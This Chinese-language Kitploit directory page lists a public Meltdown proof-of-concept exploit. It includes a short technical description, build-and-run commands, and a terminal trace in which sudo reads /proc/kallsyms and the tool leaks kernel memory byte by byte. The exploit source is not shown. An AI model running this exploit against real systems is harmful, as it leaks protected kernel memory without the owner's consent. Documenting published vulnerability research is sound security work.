Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
meltdown-exploit — Meltdown 漏洞利用 PoC | Kitploit
工具/GitHubGitHub/paboldin/meltdown-exploit
内存取证漏洞分析漏洞利用二进制利用
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Meltdown 漏洞利用 PoC

查看仓库
9492638年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MELTDOWN 漏洞利用概念验证

推测执行以不安全的方式执行代码,会在微架构(如缓存)中留下数据痕迹。

Lipp 等人于 2018 年 1 月 9 日在 https://github.com/IAIK/meltdown 发布了他们的代码。详情请参考他们的论文:https://meltdownattack.com/meltdown.pdf。

目前只能转储 linux_proc_banner,因为所需内存必须在缓存中,而每次读取 /proc/version 时 linux_proc_banner 都会被缓存。可能与 prefetch 配合使用。与 sched_yield 配合使用。

使用 make 构建,运行 ./run.sh。

尚无法绕过 KASLR,因此您可能需要输入密码才能在 /proc/kallsyms 中找到 linux_proc_banner(或手动查找)。

Flush+Reload 和目标数组方法取自 spectre 论文 https://spectreattack.com/spectre.pdf,并依据 https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ 中的线索实现。

潘多拉魔盒已经打开。

查看 完整漏洞利用视频,该视频在我的机器上使用了 IAIK 版本的代码。

结果:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

适用范围

易受攻击的 CPU/内核列表已移至: https://github.com/paboldin/meltdown-exploit/issues/19

不受攻击的 CPU/内核列表已移至: https://github.com/paboldin/meltdown-exploit/issues/22

下载工具